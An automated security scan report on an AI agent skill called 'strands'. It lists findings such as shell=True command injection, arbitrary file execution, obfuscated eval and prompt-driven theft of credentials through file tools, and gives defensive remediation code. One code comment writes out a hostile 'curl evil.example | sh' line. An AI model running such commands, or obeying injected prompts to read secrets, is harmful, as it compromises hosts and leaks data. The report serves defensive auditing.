Trust Assessment
The `strands` skill received a trust score of 10/100, placing it in the Untrusted category. It has significant security findings that must be addressed before any production use.
SkillShield's automated analysis identified 10 findings: 2 critical, 4 high, 4 medium, and 0 low severity. Key findings include arbitrary command execution, unsafe deserialization / dynamic eval, and a dangerous `__import__()` call.
The analysis covered four layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 26/100, making it the area most in need of attention.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings (10)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Arbitrary command execution.** Python shell execution (`os.system`, `subprocess`). Remediation: review all shell execution calls; ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | `skills/trippingkelsea/aws-strands/scripts/create-agent.py:87` |
| CRITICAL | **Arbitrary Python code execution via `run-agent.py`.** The `scripts/run-agent.py` script loads and executes an arbitrary Python file passed as a command-line argument using `importlib.util.spec_from_file_location` and `spec.loader.exec_module`. An attacker who controls the `agent-file.py` path can execute any Python code on the host, leading to full system compromise. Remediation: do not allow execution of arbitrary Python files from untrusted sources; if the script is intended for development, warn users clearly about the risk. Consider sandboxing the execution environment or restricting agent files to a trusted repository. | LLM | `scripts/run-agent.py:20` |
| HIGH | **Unsafe deserialization / dynamic eval.** Python builtins/import manipulation. Remediation: remove obfuscated code-execution patterns; legitimate code does not need base64-encoded payloads executed via `eval`, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | `skills/trippingkelsea/aws-strands/tests/test_imports.py:102` |
| HIGH | **Dangerous call: `__import__()`.** Call to `__import__()` detected in function `test_experimental_imports`; this can execute arbitrary code. Remediation: avoid dangerous functions such as `exec`/`eval`/`os.system`; use safer alternatives. | Static | `skills/trippingkelsea/aws-strands/tests/test_imports.py:102` |
| HIGH | **Command injection in the generated `run_command` tool.** Agent projects generated by `scripts/create-agent.py` include a `run_command` tool that executes shell commands with `subprocess.run(command, shell=True, ...)`. If the `command` argument is influenced by untrusted LLM output (e.g., from a user prompt), an attacker can inject arbitrary shell commands, leading to remote code execution, data exfiltration, or system compromise; `shell=True` exacerbates the risk by enabling piping and command chaining. Remediation: avoid `shell=True` for commands derived from untrusted input; pass commands as a list of arguments (`shell=False`) and explicitly sanitize or whitelist commands and arguments. Warn clearly about the dangers of enabling such a tool for agents exposed to untrusted input. | LLM | `scripts/create-agent.py:70` |
| HIGH | **Excessive permissions and data exfiltration via default `read_file` and `write_file` tools.** Agents generated by `scripts/create-agent.py` include `read_file` and `write_file` tools by default, allowing the agent to read and write arbitrary files. If the agent is exposed to untrusted input, a malicious prompt could instruct it to read sensitive files (credentials, configuration, private keys) or write malicious content to system paths, leading to data exfiltration, privilege escalation, or system compromise. Remediation: do not include broad filesystem tools by default in agents intended for production or untrusted environments; restrict file paths to a safe sandbox or require explicit user confirmation for sensitive operations. | LLM | `scripts/create-agent.py:48` |
| MEDIUM | **Unsafe deserialization / dynamic eval.** Decryption followed by code execution. Remediation: remove obfuscated code-execution patterns (same remediation as the HIGH finding above). | Manifest | `skills/trippingkelsea/aws-strands/tests/test_imports.py:159` |
| MEDIUM | **Unsafe deserialization / dynamic eval.** Decryption followed by code execution. Remediation: remove obfuscated code-execution patterns (same remediation as the HIGH finding above). | Manifest | `skills/trippingkelsea/aws-strands/tests/test_imports.py:168` |
| MEDIUM | **Built-in `shell` and `python_repl` tools grant arbitrary execution.** `SKILL.md` explicitly lists `shell` and `python_repl` as built-in tools available in `strands-agents-tools`. When enabled, they allow the agent to execute arbitrary shell commands and Python code; for an agent exposed to untrusted input this creates a severe command-injection and code-execution risk. Remediation: warn clearly about the security implications, and advise enabling these tools only in trusted, sandboxed environments or with strict input validation and access controls. | LLM | `SKILL.md:149` |
| MEDIUM | **Unpinned external binary execution in the MCPClient example.** `SKILL.md` provides an `MCPClient` integration example that executes an external binary with `command="uvx", args=["some-mcp-server@latest"]`. Relying on `@latest` without pinning a specific version introduces supply-chain risk: if `uvx` or `some-mcp-server` is compromised or a malicious version is published, the agent could execute malicious code. Remediation: pin to a known-good version (e.g., `some-mcp-server@1.2.3`) and implement integrity checks for external binaries. | LLM | `SKILL.md:199` |
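The remediation suggested for the `run_command` findings (argument lists instead of `shell=True`, plus an allowlist) can be sketched as below. This is a minimal illustration, not code from the scanned skill; the `ALLOWED_COMMANDS` set and `safe_run` helper are hypothetical names.

```python
import shlex
import subprocess

# Hypothetical allowlist: only these executables may be invoked by the tool.
ALLOWED_COMMANDS = {"ls", "cat", "echo"}

def safe_run(command: str) -> str:
    """Run a command without shell=True, rejecting anything not allowlisted."""
    argv = shlex.split(command)  # tokenize ourselves instead of handing a string to a shell
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {command!r}")
    # shell=False (the default): pipes, chaining, and substitution are not interpreted
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout

# safe_run("curl evil.example | sh") raises PermissionError: "curl" is not allowlisted,
# and even an allowlisted binary receives "|" and "sh" as literal arguments, not shell syntax.
```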
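The sandbox restriction recommended for the default `read_file`/`write_file` tools could look roughly like this. It is a sketch under the assumption of a single sandbox root; `SANDBOX_ROOT`, `resolve_in_sandbox`, and `sandboxed_read` are hypothetical names, and `Path.is_relative_to` requires Python 3.9+.

```python
from pathlib import Path

# Hypothetical sandbox root; the agent may only touch files beneath it.
SANDBOX_ROOT = Path("/tmp/agent-sandbox").resolve()

def resolve_in_sandbox(user_path: str) -> Path:
    """Resolve a path and refuse anything that escapes the sandbox root."""
    candidate = (SANDBOX_ROOT / user_path).resolve()  # collapses any ".." segments
    if not candidate.is_relative_to(SANDBOX_ROOT):
        raise PermissionError(f"path escapes sandbox: {user_path!r}")
    return candidate

def sandboxed_read(user_path: str) -> str:
    """A read_file-style tool restricted to the sandbox."""
    return resolve_in_sandbox(user_path).read_text()

# resolve_in_sandbox("../../etc/passwd") raises PermissionError:
# after resolution the candidate is /etc/passwd, outside SANDBOX_ROOT.
```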
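For the critical `run-agent.py` finding, one way to keep the `spec_from_file_location`/`exec_module` loading pattern while restricting where agent files may come from is a trusted-directory check, sketched below. `TRUSTED_AGENTS_DIR` and `load_agent_module` are hypothetical names, not the skill's actual API.

```python
import importlib.util
from pathlib import Path

# Hypothetical trusted directory; only agent files beneath it may be loaded.
TRUSTED_AGENTS_DIR = Path("/tmp/trusted-agents").resolve()

def load_agent_module(path_str: str):
    """Load a Python agent file, but only from the trusted directory."""
    path = Path(path_str).resolve()
    if not path.is_relative_to(TRUSTED_AGENTS_DIR):  # Python 3.9+
        raise PermissionError(f"agent file outside trusted dir: {path_str!r}")
    spec = importlib.util.spec_from_file_location("agent", path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # executes the file's top-level code
    return module
```

This does not remove the risk of executing a trusted file's code, but it closes the "attacker supplies an arbitrary path" avenue described in the finding.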
Powered by SkillShield